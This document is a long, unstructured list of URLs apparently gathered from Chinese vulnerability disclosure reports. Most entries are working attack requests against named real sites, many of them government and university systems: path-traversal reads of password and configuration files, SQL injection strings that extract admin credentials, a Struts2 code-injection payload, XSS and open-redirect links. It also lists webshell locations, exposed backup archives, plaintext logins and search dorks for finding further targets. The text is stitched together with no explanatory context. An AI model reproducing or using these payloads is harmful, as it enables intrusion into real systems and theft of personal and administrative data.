http://27.22.85.54:18080/suite/include/ http://27.22.85.54:18080/suite/bin/ http://27.22.85.54:18080/suite/download http://27.22.85.54:18080/suite/bin http://27.22.85.54:18080/suite/tools http://27.22.85.54:18080/suite/wap http://www.hceb.edu.cn:8080/suite/include/ http://221.232.128.78:83/WebSite/News.aspx?id=412 http://www.hbinvest.gov.cn/prws/index2.aspx?area_code=420600&str= http://www.yafcj.com/Web_Site/house_list.aspx?lmid=17 http://58.19.182.234:8090/PBBS/publicnoticeservlet?command=downloadFile&instanceuuid= 
http://www.sandpay.com.cn/website/common/detail.do?kind=%E6%8C%81%E5%8D%A1%E4%BA%BA%E6%9C%8D%E5%8A%A1%EF%BC%8D%E6%8C%81%E5%8D%A1%E4%BA%BA%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98&goto=article&id=56 http://www.xfxzfw.gov.cn:8083/ http://www.sdban.com/html/2014/03/07/ http://www.sdban.com/src/ http://www.sdban.com/src/Beelink2006_JYSRC.rar http://www.ctttj.com/shell.asp http://www.ctttj.com/jsyd_show.asp?news_id=233 http://www.ctttj.com/include/ http://www.ctttj.com/Images/ http://www.wxinn.com/hotel/PhotoC.php?type=1 http://www.eastfair.com/fair/admin/upProduct.asp http://www.xxx.com/sofpro/otherproject/dcwj/dcwj.jsp?id=7%27 http://tuniu.com//giftcard/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fhosts%2500.jpg.html http://tuniu.com//giftcard/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.html http://124.115.170.112:8080/clbt/login.jsp http://114.247.129.12/ulp/login.jsp http://m.t3.com.cn:80/detail/onlineId/8367430815293495253 http://m.t3.com.cn:80/detail/onlineId/8367430815293495253* http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jsp?siteID=8a8080820b78cd84010b79331b92001e http://www.timber2005.com/ http://www.jtlcsoft.com http://www.jtlcsoft.com/bs2.asp?f=804 http://58.118.36.16/ http://tuan.aili.com/ http://tuan.aili.com/ajax/system.php?id=17871&title=%5B%E4%B8%9C%E7%9B%B4%E9%97%A8%5D+%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E4%BB%85%E5%94%AE29%E5%85%83%2C%E4%BB%B7%E5%80%BC300%E5%85%83%E5%87%BB%E5%89%91%E4%BD%93%E9%AA%8C%E8%AF%BE1%E8%8A%82!%E5%9B%BD%E5%AE%B6%E7%BA%A7%E8%BF%90%E5%8A%A8%E5%91%98%E4%B8%93%E4%B8%9A%E6%8E%88%E8%AF%BE%2C%E4%B8%BA%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%B8%80%E6%A0%B7%E7%9A%84%E6%84%9F%E5%8F%97!%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E6%AC%A2%E8%BF%8E%E6%82%A8%E7%9A%84%E5%88%B0%E6%9D%A5!&team_id=57826&action=showbaidumap http://yanjing.com.cn/ConTent.asp?MainId=4&BigClassid=1 
http://124.207.155.136:8080/signUp/system/indexLogin.action http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62 http://www.chinanet.cc/cpweb/cpweb.asp?typeid=1 http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78 http://218.94.107.84:8080/zw/ http://218.94.107.84:8080/zw/download.jspx?dispatch=download&loadWhere=loadData&filename=WinRAR.exe&fpath=download http://218.94.107.84:8080/zw/download.jspx?dispatch=download&loadWhere=loadData&filename=tomcat-users.xml&fpath=../../conf/ http://218.94.107.84:8080/manager/html/ http://card.17wo.cn/htlogin.php http://jmzj.jmwjm.gov.cn:8080/ http://www.grustv.com/admin/index.asp example:http://www.grustv.com/about.asp?id=489 http://120.194.234.178:9999/lh/login.action?actions=index SHELL:http://120.194.234.178:9999/lh/bak.jsp http://xiaobao.snnu.edu.cn/bencandy.php?id=965 http://training.yyzzgz.gov.cn/ http://www.chanjet.com/bencandy.php?fid=41&id=185 http://bbs.auto.ifeng.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://bbs.auto.ifeng.com/thread-1351174-1-1.html http://travel.cmbc.com.cn/trip/payment/paymenttripaa/send.jhtml http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa data:text/html;charset=utf-8;base 64 http://cn.shop-builder.cn/ http://cn.shop-builder.cn/main.php?m=vote&s=vote http://www.tdc.zjut.edu.cn/ http://hangye.letv.com/MSG/login.html http://hangye.letv.com/MSG/index.html http://www.yndrugadmin.gov.cn/Login!input.action http://rsc.wzmc.edu.cn/List.php?BigCategoryId=26 http://job.lnu.edu.cn/common.do?method=enterprisesView&enterprisesId=3207 http://yz.cqu.edu.cn/view.php?nid=198 http://service.xjtu.edu.cn/guidedown.php?id=31 http://121.8.249.13:8080/gglList.do?method=querybybh&ggbh=20140312140825375040000 http://121.8.249.13:8080/gglList.do?method=querybybh&ggbh=20140312140825375040000 
http://www.tuniu.cn/nbooking/register.html#index& http://boss.tuniu.org/VND/VND_admit/view/agencyCheckedList.html?eyJ1aWQiOiI1Mjc2Iiwibmlja25hbWUiOiJcdTY3NGVcdTUwMjkyIiwidXNlcm5hbWUiOiJsaXFpYW4yIiwiciI6Mjc2ODUzNTU4fQ== http://www.hpu.edu.cn/siteserver/platform/background_dbSqlQuery.aspx http://www.hpu.edu.cn/sitefiles/TemporaryFiles/only/1.asp http://113.106.216.242:7001/hznt/sys/downloadModel.sy?fileName=/../../../../../../../../../../../../etc/password http://113.106.216.242:7001/hznt/sys/downloadModel.sy?fileName=/../../../../../../../../../../../../etc/shadow www.10000114.com/search/search_result_company.aspx?key=%u5305%u8F66&city=256&pro=19 http://www.jjrjw.cn:8080/sFileShow1.jsp?index=363 http://www.jjrjw.cn:8080/sFileShow1.jsp?index=363 http://www.chinapoo.cn/)的这套系统是不公开下载的,但是由于某个子站管理不当,管理员将网站程序打包放到网站目录下,被我下载了一套,之前为cncert提供过一次这个建站系统的多个漏洞,最近又分析了一下代码,之前的漏洞已经修补了,但仍然发现存在很多漏洞,由于上次拿了官网的shell,目前官网用了IIS防护软件,所以不好拿来演示,但是官网有一个栏目展示他们的很多作品(客户网站),很贴心,我们随便挑一个来演示吧。 http://www.chinapoo.cn/info/listinfo.dll?infoid=218 http://www.xinfangsheng.com/ http://ask.yaolan.com/ask.html http://space.yaolan.com/u/54034721/ http://ask.yaolan.com/question/1405171414059240ba43.html http://117.121.54.22 http://117.121.54.22/cdn.cfg http://192.168.200.1/centos http://117.121.54.22/isolinux.cfg http://192.168.200.1/centos http://192.168.200.1/centos http://221.0.92.70:8080/inspection/UL/districtsubdivision/displaydistrictsubdivision.jsp?method=query&type=edit&SYSNO=01200812150014 http://tourism.qdu.edu.cn/dede/login.php http://mdetc.sdufe.edu.cn/admin_login.aspx http://www.idc.hk/NewsDetail.aspx?art_id=192 http://img.aibang.com/pic?picid=9ba4479bb351ee0f&type= http://jw.jstu.edu.cn/ http://jw.jstu.edu.cn/ArticleView.aspx?Type=0&Id=970e4559-0125-4f6b-9071-36534171a085 http://jw.jstu.edu.cn/admin/login.aspx http://www.gz163.cn/?m=index&c= https://ovp.lenovo.com/lenovo-ovp/login.action https://ovp.lenovo.com/lenovo-ovp/1.txt http://yjsy.pku.edu.cn:8080/students/shownews.php?id=27 
http://room.space.twtstudio.com/details.php?table=office&id=6 http://drops.wooyun.org/papers/548 http://ah.118100.cn/cring/jsp/user/shop_moregift.jsp?giftType=1 http://ah.118100.cn/cring/jsp/user/shop_moregift.jsp?giftType=1 http://www.sqlmap.org http://www.yfidea.com/product.asp http://demo.yfidea.com/ http://www.yfidea.com/AnLi.asp http://oa.bh5z.net/Index.asp http://222.178.145.174:8000/Index.asp http://oa.gz65.com/ http://hsoa.bgyhs.net/ http://www.xmqwzx.com/Index.asp http://oa.lhljzx.com/ http://demo.yfidea.com/login.asp?username=123&submit2=+&Password=123 http://hl.118100.cn/cring/jsp/user/board/banglist.jsp?boardType=0 http://hl.118100.cn/cring/jsp/user/board/banglist.jsp?boardType=0 http://www.sqlmap.org www.myhedy.com/specs.php?id=21 http://sjc.nankai.edu.cn/showNews.aspx?id=77 http://lol.neotv.cn/.svn/entries http://10.X.X.73/func/web_main/display/net_tool/Ping http://xxx/z.sh http://qk.nchu.edu.cn/showgwjs.asp?id=3 http://down.chinaz.com/soft/29965.htm http://www.weentech.com/bbs/forum-14-1.html http://www.hlbe.gov.cn/ http://www.hlbe.gov.cn/hlbewh/nr.asp?id=5720 http://jl.118100.cn/cring/jsp/user/ringSpecialDetail.jsp?ringSpecialId= http://jl.118100.cn/cring/jsp/user/ringSpecialDetail.jsp?ringSpecialId=6565 http://www.sqlmap.org http://123.131.133.150:8080/wcm/ http://61.153.63.94/wcm http://www.cflac.org.cn/wcm http://wcm.xxz.gov.cn:8080/wcm/ http://www.jscnt.gov.cn/wcm/ http://www.sccnt.gov.cn http://218.94.123.203/wcm http://203.86.89.25/wcm/ http://www.lfcgs.gov.cn:8080/wcm/ http://iwr.cass.cn/wcm/ http://www.whxinzhou.gov.cn:9090/wcm/ http://123.131.133.150:8080/wcm/ http://122.224.174.82:8090/wcm/ http://www.qhepb.gov.cn http://211.154.254.113:8080/wcm/ http://i.sohu.com/ http://ktv.cms.bookinge.com/?m=login.checkAccount&account=1 http://www.westarsoft.com/ http://www.westarsoft.com/list/?bid=31 inurl:/zwdt/bgxz.jsp http://www.cszw.gov.cn/web/zwdt/bgxz_bg.jsp?id=101 http://zwzx.lueyang.gov.cn/web/zwdt/bgxz_bg.jsp?id=0002 
http://61.161.111.133/web/zwdt/bgxz_bg.jsp?id=101 http://www.xhxspzx.com/web/zwdt/bgxz_bg.jsp?id=101 http://xzfw.xjcbcr.gov.cn/web/zwdt/bgxz_bg.jsp?id=103 http://zwzx.chenggu.gov.cn/web/zwdt/bgxz_bg.jsp?id=101 http://222.179.44.172/web/zwdt/bgxz_bg.jsp?id=128 http://www.hlxzsp.gov.cn/web/zwdt/bgxz_bg.jsp?id=101 http://fw.ynqb.gov.cn:8081/web/zwdt/bgxz_bg.jsp?id=161 http://218.200.21.34/web/zwdt/bgxz_bg.jsp?id=101 http://hb.118100.cn/cring/jsp/user/board/banglist.jsp?boardType=0 http://hb.118100.cn/cring/jsp/user/board/banglist.jsp?boardType=0 http://www.sqlmap.org http://webmail.vanceinfo.com http://sut.edu.cn http://faxuexi.tju.edu.cn/sub_teach_program.php?id=14 http://www.verydz.com/ http://cas.xxx.xxx.letv.cn:7777/ liuwang:NULL时成功。 http://114.255.189.58/Default.aspx http://114.255.189.58/web.rar可以直接访问下载,里面是web.config http://114.255.189.58/letf.aspx http://114.255.189.58/Message/Cardit.aspx http://114.255.189.58 http://58.215.18.52/homePage.action http://zj.118100.cn:8090/cring/jsp/user/ringSpecialList.jsp?ring_special_type_id=1 http://www.sqlmap.org http://down.ggv.com.cn/down/index_02.php?wqxtype=E828 http://www.ggv.com.cn/newdown/softlist.php?wqxtype=nc3000 http://www.ggv.com.cn/login.htm http://renew.ggv.com.cn http://www.ggv.com.cn/newweb/login.php http://www.ggv.com.cn/newdown/subdownload.php?wqxtype=T1800 root:renew http://www.ggv.com.cn/newweb/topnew/top.php http://kd.czinfo.net/cx_ok.asp?u_name=122222 http://kd.czinfo.net/cx_ok.asp?u_name=122222 http://www.sqlmap.org http://www.chinacct.org/search.asp?SearchKey=a http://www.chinacct.org/admin/Login.asp http://182.151.203.169:2013/cfms/login.action http://60.247.100.113/ftp.rar http://ffp.airchina.com.cn/admin/adminLogin.jsp http://115.182.3.191/admin.tar.gz http://115.182.3.194/code.tar.gz http://kfmail.sdo.com/ http://www.576story.com/ http://www.west263.com目测是在西部数码那搞得域名或者空间于是拿着这些信息继续猜解主站和论坛的账号密码 http://58.215.55.13/report/ku6_id.php http://wsbm.npc.gov.cn/wsbm/application/editpass/editpass!input.action 
url:http://house.focus.cn/lslj/forum/forum_board_new.php?page_id=10&uid=0&pass=0&page=-1 site:focus.cn inurl:page_id http://jwgl.aust.edu.cn/ http://wooyun.org/bugs/wooyun-2014-054857 http://oa.corp.56.com是OA系统 http://auto.118114.cn/ http://auto.118114.cn/entry http://auto.118114.cn/block/loginact?act=get_areas&pcode=110000®istercateg=1&v=37 http://zsb.hrbcu.edu.cn/showPRsult.php?id=full http://www.haitianoa.com/ http://oa.haitianoa.com/login.asp http://www.s***.net/VOS/login.asp http://www.s***l.com/vos/login.asp http://www.***z.net:8972/login.asp http://www.***x.com/oa/login.asp http://vos.t***e.edu.cn/login.asp http://c***a.***p.net/login.asp http://121.30.***.***/login.asp http://dfoa.***l.com/login.asp http://60.**.34.**:8086/login.asp http://oa.t***.edu.cn/login.asp http://www.***u.com/login.asp http://oa.***.com.cn/login.asp http://211.68.***.***/login.asp http://oa.***y.com/login.asp http://116.228.***.***/login.asp Url:http://home.focus.cn/zxrj/account.php?this_login_id=54544875 http://home.focus.cn/elite/elite_list.php?utype=9988 http://home.focus.cn/elite/elite_list.php?utype=9988 http://jl.wo.com.cn/ http://jl.wo.com.cn/iphone/searchApp.psml http://222.73.2.29/Login.aspx admin1:123456 http://new.hbglky.com:80/ad/list.php?xw_fl=4-0 http://iec.imu.edu.cn/ inurl:szwyadmin/login.asp http://202.198.0.22/jiaowu/zpx/ http://www.fosu.edu.cn/business/party/party1/guomao/ http://www.keerqin.gov.cn/kqrd/ http://www.kxjl.org/ http://www.dlwaiyu.com/ http://www.nun.edu.cn/ http://www.zzjjx.net/ http://sace.imust.cn/jzs/ http://www.njjcedu.com/ http://jyfw.zjvtit.edu.cn/cjb/ http://www.xn--fiqr2vlzer5bvx8ehel.com/ http://jcb.zjsru.edu.cn/ http://glxyl.zjweu.edu.cn/ http://courses.cqjtu.edu.cn/ http://www.lnxrd.gov.cn/ http://218.107.63.241:82是OA系统 http://opac.jxlib.gov.cn/NTRdrLogin.aspx http://rsc.bistu.edu.cn/ http://rsc.bistu.edu.cn/NewsShow_zcfg.asp?id=360 http://sppm.bupt.edu.cn/ http://sppm.bupt.edu.cn/show_news.asp?id=362 http://www.xtlib.com/ 
http://www.xtlib.com/ab_cont.asp?ID=1221 http://www.js96777.com/stk/showBanks.do?bankType=1 http://www.0551nc.org/ http://www.0551nc.org/news/list.asp?news_id=137 http://www.ewinshine.com/ewinshineindex.action http://www.gdhsc.edu.cn/web.rar http://123.125.96.211:9000/robot/template/themes/blue2/images/x.jsp http://www.yffsc.com/hotSales/youpin.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 site:www.capub.cn http://i.sohu.com/ http://hk.chinaunicom.com/app_mgr/app-mgr/appInfo?downloadPath=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n&m=down http://jwc.hkxy.edu.cn/jwc/SchoolView.asp?id=4 http://www.hakim.com.cn/wwwroot.rar http://no2.vod165.com/login.do http://www.ruzhou.gov.cn/login/Rjcms.do inurl:broadcastview.aspx?InfoId= http://www.xtsxzfw.gov.cn/Broadcast/broadcastview.aspx?InfoId=03158&type=infodtxx http://www.xtsxzfw.gov.cn/Broadcast/broadcastview.aspx?InfoId=03158%27and/**/%201=%28select/**/%20@@VERSION%29and/**/%271%27=%271&type=infodtxx http://zyjy.xtsxzfw.gov.cn/admin/login.aspx inurl:InFlowInformation.aspx?InfoFlowId= http://www.cdxzfww.gov.cn/chengdeshi/PostAdvise/AdviseView.aspx?InfoId=00000007%27and/**/%201=%28select/**/%20@@VERSION%29and/**/%271%27=%271 http://www.114mall.com.cn/exchangecenter/CommodityInfo.aspx?ID=26639&seqid=49859 http://www.tongfangpc.com/MicroFilm/Default.aspx活动页面注册任意用户可上传任意文件 http://www.bt49.com http://xxgk.sihong.gov.cn/zfxxgk/subjectinfo.jsp?subjectbm= http://demo.kesion.com/ http://wiki.ubuntu.org.cn http://www.smecf.gov.cn/editor/Dialog/play.asp?raiz=E:\WWWROOT\SME\Editor http://www.shypost.com/ 
http://webscan.360.cn/vul/view/vulid/1944) http://www.dcsti.gov.cn/ProductShow.asp?ID=180 http://www.minmetalsland.com/fanti/productshow.asp?id=529 http://www.tcgcn.com/productshow.asp?id=517 http://www.laserbtb.com/productshow.asp?id=83 http://www.adingxiu.com/productshow.asp?id=1007 http://www.hotou.com.cn/productshow.asp?id=178 http://www.eheim.cn/productshow.asp?id=115 http://www.yinlongguolu.com/ProductShow.asp?id=375 http://www.shypost.com/ http://api.t.iqiyi.com/qx_api/framework/all_in_one?data={%22requests%22:[{%22uri%22:%22/comment/get_user_simple_info%22 http://www.qdgjj.com/ http://www.qdgjj.com:8080/grcx/gjindex.aspx http://www.qdgjj.com:8080/发现存在目录遍历,有备份文件可下载~对.net不是很熟悉,所以不知道这个备份文件价值有多高~信息有多敏感,但是像这样一个关系着个人敏感信息(工作单位、身份证号、姓名、公积金信息等)的网站存在目录遍历是很危险的! http://www.netgather.com/ http://www.iprima.com.cn/products_detail.asp?ID=455 http://site.aweb.com.cn/queryWebSiteList.action http://oa.fxedu.cn:8080/eeoa/loginCheckPersonAction.action http://www.nj29jt.net:98/eeoa/loginCheckPersonAction.action http://60.10.2.7/eeoa/loginCheckPersonAction.action http://122.228.156.7/eeoa/loginCheckPersonAction.action http://120.193.248.122/eeoa/loginCheckPersonAction.action https://mail.xxx.com/down.php?netdisk=1 http://sale.chinaedu.com/admin http://my.zhaopin.com/loginmgr/login_from_email.asp http://jt081311.qy01.cn/main1.asp?pid=0 www.scatc.net GOOGLE:inurl:/jwweb/ http://www.xz12348.gov.cn/baselogin/Login_login.action http://www.bankuandai.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat%28userid,0x23,pwd%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 http://gacfiatauto.hz.letv.com/ site:gacfiatauto.hz.letv.com http://gacfiatauto.hz.letv.com/php/voguserlist.php?callback=?&tel= http://gacfiatauto.hz.letv.com/php/vogusernum.p%20hp?callback=?&tel=5 http://211.68.196.67:808/poweb/asearch.do?LanguageType=0&status=showpage 
http://211.68.196.67:808/poweb/asearch.do?Langu http://sqlmap.org http://lvyou.elong.com/里的游记评论处,如下图所示: http://www.cnzz.com/ http://bbs.cnzz.com/home.php?mod=space&do=profile&uid=1 http://nokiabbs.cnmo.com/thread-14730559-1-1.html http://www.ahwst.gov.cn:8011/syhl/login.asp http://www.ahwst.gov.cn/dengjios/ http://www.mjwhw.gov.cn http://member.aili.com http://member.aili.com/index.php?a=search&c=content&channel=&fromTime=1&m=arc&title=Mr.&toTime=&type=arc http://member.aili.com/index.php?a=search&c=content&channel=&fromTime=1&m=arc&title=Mr.&toTime=%d5%27%d5%22&type=arc http://www.yfidea.com/product.asp http://demo.yfidea.com/ http://www.yfidea.com/AnLi.asp http://oa.bh5z.net/Index.asp http://222.178.145.174:8000/Index.asp http://oa.gz65.com/ http://hsoa.bgyhs.net/ http://www.xmqwzx.com/Index.asp http://oa.lhljzx.com/ url:/plus/flink_add.php xxx.com/SB/Student/ReportStudentList.aspx?CellID= xxx.com/BG/Mail/UMessageBrowse.aspx?mailid=XXX http://210.40.176.100/index.asp http://nlearning.hnswxy.com/index.asp http://222.240.135.75:8083/index.asp http://220.168.40.22:81/index.asp http://220.168.31.38:2000/contr.asp http://jxhd.yxnzy.net/index.asp http://58.20.60.38:2000/index.asp http://211.81.174.140/AddBookCart.aspx?ID=844565 http://219.242.65.10/ResourceList.aspx?SectionId=0e282b34-70f7-44ab-b56a-272f4cfa73f5 http://219.242.65.10/Donate.aspx?SectionId=5164f247-5ce1-4df1-8693-5d9c0bd6797e http://219.242.65.10/LeaveWordTwoList.aspx?SectionId=9a7eef33-7edf-4a2b-8d99-ffe2e6ed61d7 http://219.242.65.10/ArticleList.aspx?SectionId=e02620e9-a0ff-48b9-94c6-9539e39eff81 http://219.242.65.10/ResourceShow.aspx?SectionId=0e282b34-70f7-44ab-b56a-272f4cfa73f5&ResId=3ea39c3b-e529-4244-944a-b2c5fcd5030f http://219.242.65.10/DownLoad.aspx?SectionId=1aec0439-b552-4827-959b-f2a1a617d6d5 http://shrichinamobile.hiall.com.cn/cm/arrange.php?place=4 http://dev.home.sohu.com/common/ http://dev.home.sohu.com/common/400/ 
http://localhost/tmw/8/viewfile/account.xml?type=gl&logtype=../../turbomail/accounts/root/postmaster(你想要读密码的用户名)&sessionid=此处需普通用户sessionid http://localhost/tmw/8/mailmain?type=restorebackup&filename=/tmbackup2014-05-17_18_10_1.php&sessionid=此处需普通用户sessionid&intertype=ajax http://www.lnrkw.gov.cn/newsshow.asp?ArticleID=396 http://地址/conf/servlet/outputdb?parentid=0 http://111.160.55.180:18080/conf/servlet/outputdb?parentid=0 http://223.252.196.130/common/web_meeting/index.php?module=meeting_info&userId=1&siteId=10&meetingType=2&meetId=813332349 http://www.youyax.com/ http://down.chinaz.com/soft/33435.htm http://cert.unionpay.com/company/en/register?lang=../../../../WEB-INF/web.xml http://cert.unionpay.com/company/en/register?lang=../../../../WEB-INF/classes/data/import-data.sql http://cert.unionpay.com/company/en/register?lang=../../../../WEB-INF/classes/sql/h2/schema.sql http://cert.unionpay.com/company/en/register?lang=../../../../WEB-INF/classes/application.properties http://www.turbomail.org/download.html http://klas.cuit.edu.cn/ http://www.handbb.com/ckfinder/ckfinder.html http://wap.handbb.com/caidan.jsp?gid=19 http://plx.hz.letv.com/ http://plx.hz.letv.com/php/plxtpadd.php?callback=jQuery1710625948480097577_1400496281923&tpid=5&_=1400496312754 http://210.22.5.78/web/login_normal.php http://rukou.xzkd.com/logon.do http://abt.clbs.cn/abt/home/login.action http://t.soufun.com/post_add.php?&post_content=这里是内容 http://t.soufun.com/follow_add.php?follow_id=此处为注册用户ID&iframe=1&random=0.7860255646232082 http://t.soufun.com/follow_add.php?follow_id=46661553&iframe=1&random=0.9105442526532137 
http://t.soufun.com/post_add.php?&post_content=%B5%F0%B1%AC%C1%CB%A3%AC%C1%C1%CF%B9%C1%CB%CE%D2%B5%C4%32%34%4B%EB%B4%20%BD%F0%B9%B7%D1%DB%68%74%74%70%3A%2F%2F%6A%69%6E%74%61%69%6C%69%73%68%65%2E%73%6F%75%66%75%6E%2E%63%6F%6D%2F%62%62%73%2F%31%30%31%30%37%33%37%30%34%39%7E%2D%31%2F%31%38%36%30%35%36%31%39%37%5F%31%38%36%30%35%36%31%39%37%5F%32%2E%68%74%6D%D5%E2%BE%B9%C8%BB%CA%C7%40%D3%EE%D6%E6%B5%DA%D2%BB%B4%F3%CB%A7%B8%E7&andComment=&toweibo=&oldComment=&pic_path=&7990988821018783 http://t.soufun.com/pm_add.php?&pm_content=这里是内容&reader_uid=这里是用户ID&reader_name=&695832881602396 http://122.224.8.3/admin/ADedit.aspx http://122.224.8.3/admin/knowledge.aspx http://122.224.8.3/Default_20080624.aspx http://122.224.8.3/nbb/wiki.aspx?wid=3034%20and%201=1 http://122.224.8.3/nbb/wiki.aspx?wid=3034%20and%201=2 http://qun.qq.com/manage.html#click http://www.qzdatasoft.com/ http://www.qzdatasoft.com/cgal.html http://**.**.**/Login_xsmm.asp_ http://**.**.**/Login_xsmm.asp_ http://**.**.**/Login_xsmm.asp_ http://**.**.**/oa/Login_xsmm.asp_ http://**.**.**/jw/Login_xsmm.asp_ http://**.**.**/jiaowu/ https://auth.alipay.com/login/logout.htm?goto= https://auth.alipay.com/login/logout.htm?goto=jianzhan.www.net.cn/product/TryoutTop?id=199%26t%3d%26u%3dhttp%3a//前往域名 https://auth.alipay.com/login/logout.htm?goto= jianzhan.www.net.cn/product/TryoutTop?id=199&t=&u=http://前往地址 http://www.dssoft.cn http://192.168.90.206/home.php?id=1 http://192.168.90.206//home.php?id=1 http://sqlmap.org http://cst365.com/login.action http://cst365.com/test.txt http://www.camra2006.org.cn/admin/News/InfoEdit.aspx?iProject=5&iInfoID=396 http://www.chinanetcenter.com/Home/CsLogin http://cma.org.cn/sysinfo.html http://mail.gduf.edu.cn/sysinfo.html http://mail.nbradio.com/sysinfo.html http://mail.workercn.cn/sysinfo.html http://mail.eqsc.gov.cn/sysinfo.html http://mail.shutcm.com/sysinfo.html http://222.44.47.137/sysinfo.html http://210.45.208.2/sysinfo.html http://run.wstp8.com/js_talk.php?bid=2190&btype=1 
http://run.wstp8.com/js_talk.php?bid=2190&btype=1 http://www.sqlmap.org http://drops.wooyun.org/webview.html) http://www.55.la/run/ding_banner.php?bid=21022 http://www.55.la/run/ding_banner.php?bid=21022 http://www.sqlmap.org www.55.la\session http://www.2977.com/card/getservers.aspx?gameCode=1 http://www.2977.com/card/getservers.aspx?gameCode=1 http://www.sqlmap.org www.2977.com\session inurl:infos.php site:gov.cn inurl:hwcrm inurl:hwcrm site:edu.cn 1.www.xhfda.gov.cn/xhsp/msg.php?todo=add 2.www.kazx.com.cn/msg.php?todo=add 3.www.dasi.gov.cn/zhuanti/msg.php?todo=add http://www.tzhuawang.com/msg.php?todo=add http://www.xhfda.gov.cn/xhsp/infos.php?two=85 http://www.tzhuawang.com/infos.php?two=40 http://www.xhfda.gov.cn/xhsp/msg.php?todo=add www.aibang.com/?area=bizpay&cmd=card&id=1 http://account.us.changyou.com/ http://cde.us.changyou.com/ http://buglist.demo.xiaoi.com/zentao/user-login.html http://127.0.0.1/zentao/editor-edit-RDpceGFtcHBcemVudGFvXG1vZHVsZVxhY3Rpb25cbW9kZWwucGhwXGNyZWF0ZQ==-extendModel-.html http://127.0.0.1/zentao/editor-edit-RDpceGFtcHBcemVudGFvXHd3d1xkYXRhXHVwbG9hZA==-newExtend-.html http://127.0.0.1/zentao/data/upload/muma.php inurl:/web_news/DownClassList.aspx www.xszbjyw.com:82 http://www.xszbjyw.com:82 http://202.114.89.64/tingbookall.aspx?c=145951 http://61.136.150.170:8090/tingbookall.aspx?c=18845 http://www.hglib.cn:8077/mobile/BookList.aspx?Typeid=1-1-1 inurl:messageShow!show.action http://www.iactive.com.cn/acenter/index.action http://www.cccf.com.cn/getIndex.do http://www.cccf.com.cn/net/pages/download.jsp?path=uploads%5C2013%5C04%5C11%5C1310185844586.doc&name=%C3%F0%BB%F0%C6%F7%B2%FA%C6%B7..doc http://www.cccf.com.cn/net/pages/download.jsp?path=/net/pages/download.jsp http://dealer.yuncars.cn站点下, http://dealer.yuncars.cn/install.php http://www.dqfcj.com.cn/index.net.xml http://www.dqfcj.com.cn/maintainAction.do?method=init http://jxt.yb10010.com/Public/ShowDetail.aspx?LB=2&ID=267,ID存在注入 http://jxt.yb10010.com/Public/JxtLoginS.aspx 
site:ptfwzx.gov.cn http://116.255.247.133 intext:SULCMIS http://lib.szsy.cn/xxb/overduebooks.aspx?page= http://lib.szsy.cn/xxb/changepas.aspx http://xxgk.sihong.gov.cn/zfxxgk/serviceobjectinfo.jsp?s http://www.yfidea.com/product.asp http://demo.yfidea.com/ http://www.yfidea.com/AnLi.asp http://oa.bh5z.net/Index.asp http://222.178.145.174:8000/Index.asp http://oa.gz65.com/ http://hsoa.bgyhs.net/ http://www.xmqwzx.com/Index.asp http://oa.lhljzx.com/ http://t.qq.com/shouji132180089135 www.chinacntv.com/data/data.rar https://cdngwbn.115.com inurl:mafen.asp http://221.181.233.195:10003/bookxian.asp?id=597752 http://221.181.233.195:10003/bookxian1.asp?id=597752 http://221.181.233.195:10003/bookxian.asp?id=597752 http://221.181.233.195:10003/bookxian.asp?id=597752 http://ts.gylyxx.com/bookxian.asp?id=521155 http://ts.gylyxx.com/bookxian.asp?id=521155 http://ts.gylyxx.com/bookxian1.asp?id=521155 http://ts.gylyxx.com/bookxian1.asp?id=521155 http://221.181.233.195:10003/down.asp?id=597752 http://221.181.233.195:10003/down.asp?id=597752 http://221.181.233.195:10003/down.asp?id=597752 http://ts.gylyxx.com/down.asp?id=521155 http://ts.gylyxx.com/down.asp?id=521155 http://221.181.233.195:10003/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://221.181.233.195:10003/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://221.181.233.195:10003/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://ts.gylyxx.com/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://ts.gylyxx.com/look.asp?fenlei=%BF%C6%C6%D5%B6%C1%CE%EF%A1%A4%C9%FA%CE%EF%BF%C6%D1%A7&mingcheng=597752 http://221.181.233.195:10003/default.asp http://221.181.233.195:10003/default.asp http://221.181.233.195:10003/default.asp http://ts.gylyxx.com//default-yuan.asp 